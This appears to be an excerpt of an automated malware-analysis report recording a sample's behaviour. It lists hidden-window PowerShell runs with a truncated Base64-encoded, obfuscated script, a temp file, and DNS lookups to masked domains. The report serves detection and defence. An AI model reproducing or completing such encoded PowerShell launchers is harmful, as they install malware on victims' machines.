Technical Information
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e JABEADYAZQA2AHkAOQBmAD0AKAAoACcAWgBtACcAKwAnAHMAJwApACsAKAAnAHIAbwAnACsAJwByAGoAJwApACkAOwAuACgAJwBuAGUAJwArACcAdwAtAGkAdABlAG0AJwApACAAJABFAE4AVgA6AFUAcwBlAHIAUAByAE8AZgBpAGwARQBcAEwAVAAwAE...
- '%CommonProgramFiles%\Microsoft Shared\DW\DW20.EXE' -x -s 1568
- %TEMP%\1180334.cvr
- DNS ASK ja##uh.nl
- DNS ASK eq##am.de
- DNS ASK si####ile.com.mx
- DNS ASK le###esmet.be
- DNS ASK si##i.net
- DNS ASK sh###cush.com
- DNS ASK od##ille.de
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e JABEADYAZQA2AHkAOQBmAD0AKAAoACcAWgBtACcAKwAnAHMAJwApACsAKAAnAHIAbwAnACsAJwByAGoAJwApACkAOwAuACgAJwBuAGUAJwArACcAdwAtAGkAdABlAG0AJwApACAAJABFAE4AVgA6AFUAcwBlAHIAUAByAE8AZgBpAGwARQBcAEwAVAAwAE...' (with hidden window)